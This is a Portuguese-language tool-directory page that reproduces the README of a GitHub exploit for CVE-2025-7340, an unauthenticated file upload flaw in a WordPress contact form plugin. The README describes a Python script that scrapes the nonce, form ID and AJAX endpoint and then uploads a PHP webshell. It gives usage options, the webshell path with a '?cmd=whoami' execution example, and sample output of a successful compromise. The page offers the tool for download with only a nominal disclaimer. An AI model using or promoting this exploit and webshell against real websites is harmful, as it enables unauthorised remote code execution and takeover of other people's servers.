Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-7340 — HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. <= 2.2.1 - Unauthenticated Arbitrary File Upload | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-7340
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubnxploited/cve-2025-7340

CVE-2025-7340

HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. <= 2.2.1 - Unauthenticated Arbitrary File Upload

Ver Repositório
73há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 Widget de Formulário de Contato HT <= 2.2.1 - Upload Arbitrário de Arquivo Não Autenticado (CVE-2025-7340)

CVE: CVE-2025-7340
CVSS: 9.8 (Crítico)

📝 Descrição

O plugin HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder para WordPress é vulnerável a uploads arbitrários de arquivos devido à falta de validação do tipo de arquivo na função temp_file_upload em todas as versões até, e incluindo, 2.2.1.

Isso permite que atacantes não autenticados façam upload de arquivos arbitrários para o servidor, potencialmente levando à Execução Remota de Código (RCE).


⚡ Script de Exploit

Este repositório inclui um script de exploit em Python que automatiza a descoberta do formulário vulnerável e faz upload de uma webshell para o site afetado.

O script detecta inteligentemente os parâmetros necessários (nonce, form_id, ajax endpoint) e faz upload de um shell PHP no caminho vulnerável.

✅ Exemplo de URL do formulário vulnerável:

http://target.com/contact/

✅ O formulário vulnerável deve estar na página que você passar para a opção -u.


📦 Requisitos

Antes de executar o script, instale os módulos Python necessários:

pip install -r requirements.txt

Conteúdo do requirements.txt:

requests
colorama

🧰 Uso

usage: CVE-2025-7340.py [-h] 

Exploit para CVE-2025-7340 - Upload Arbitrário de Arquivo Não Autenticado | por Khaled Alenazi (Nxploited)

options:
  -h, --help     mostra esta mensagem de ajuda e sai
  -u, --url URL  URL alvo, ex.: http(s)://target.com

Opções:

OpçãoDescrição
-h, --helpMostra esta mensagem de ajuda e sai
-u, --url URLURL alvo, ex.: http(s)://target.com/contact

🐚 Uso da Webshell

Quando o exploit for concluído com sucesso, você pode acessar o shell enviado no caminho fornecido.

Adicione ?cmd=<seu_comando> para executar comandos do sistema.

✅ Exemplo:

http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami

🖥️ Exemplo de Saída

Iniciando exploit contra o alvo...
Obtendo página alvo...
Extraindo parâmetros...
Nonce extraído: 346c441903
Endpoint AJAX: http://nxploit.ddev.site/wp-admin/admin-ajax.php
ID do Formulário: 86
Gerando webshell...
Enviando shell, aguarde...

[+] Exploit realizado com sucesso!

Acesse: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php

Exploit por: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited

🛑 Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa.
O autor não é responsável por qualquer dano ou uso indevido deste código.
Sempre tenha permissão explícita antes de testar contra qualquer sistema.


👨‍💻 Por

Khaled Alenazi (Nxploited)
GitHub: Nxploited

Baixar ferramenta